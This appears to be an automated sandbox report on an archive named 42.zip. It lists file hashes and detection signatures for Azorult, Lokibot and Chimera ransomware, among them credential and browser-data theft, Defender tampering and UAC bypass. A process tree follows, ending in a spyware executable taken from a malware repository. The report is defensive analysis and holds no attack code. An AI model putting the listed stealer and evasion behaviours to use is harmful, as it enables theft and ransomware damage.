Analysis
-
max time kernel
546s -
max time network
550s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
-
submitted
25/02/2025, 20:01
General
-
Target
42.zip
-
Size
220KB
-
MD5
ae68adfbad1465ab666f2a209bc183fe
-
SHA1
2293c765320ed9a345ca94d19a1e6aa8998df325
-
SHA256
010e81f7c6be480596af5a3be4e41e14f14165c4c9e055ef6d3b9d40bbc4da62
-
SHA512
f7affe2e884b08a41133ad7e6dff5ce30b8622249fcec9ad0cb4178fe8f9d3f1c4283736cd35c3a5e3437651c980c2acac725c6734ea7ac0e657328b1ef1782b
-
SSDEEP
6144:rLN3xpOL/saqkPV9FH2LqgIDSsmw093vZJT3CqbMrhryf65NRPaCieMjAkvCJv1Y:nN3xpOL/saqkPV9FH2LqgIDSsmw093vr
Malware Config
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Chimera 64 IoCs
Ransomware which infects local and network files, often distributed via Dropbox links.
-
Chimera Ransomware Loader DLL 1 IoCs
Drops/unpacks executable file which resembles Chimera's Loader.dll.
-
Chimera family
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Lokibot family
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Rms family
-
UAC bypass 3 TTPs 5 IoCs
-
Windows security bypass 2 TTPs 1 IoCs
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
-
Renames multiple (3262) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 2 IoCs
-
Modifies Windows Firewall 2 TTPs 23 IoCs
-
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
-
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 4 TTPs
-
ASPack v2.12-2.42 1 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Executes dropped EXE 25 IoCs
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 62 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Adds Run key to start application 2 TTPs 11 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Drops desktop.ini file(s) 26 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Modifies WinLogon 2 TTPs 1 IoCs
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 5 IoCs
-
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 24 IoCs
-
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 7 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 5 IoCs
-
Modifies Internet Explorer settings 1 TTPs 29 IoCs
-
Modifies registry class 7 IoCs
-
NTFS ADS 4 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 37 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 13 IoCs
-
Suspicious use of SetWindowsHookEx 23 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 6 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\42.zip1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Chimera
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b4233cb8,0x7ff9b4233cc8,0x7ff9b4233cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1840 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6328 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4572 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6900 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7388 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7408 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7688 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6804 /prefetch:82⤵
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1276 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7456 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7940 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7192 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8288 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1812,7110756792926701396,17044522331971949773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8232 /prefetch:12⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004D01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"1⤵
-
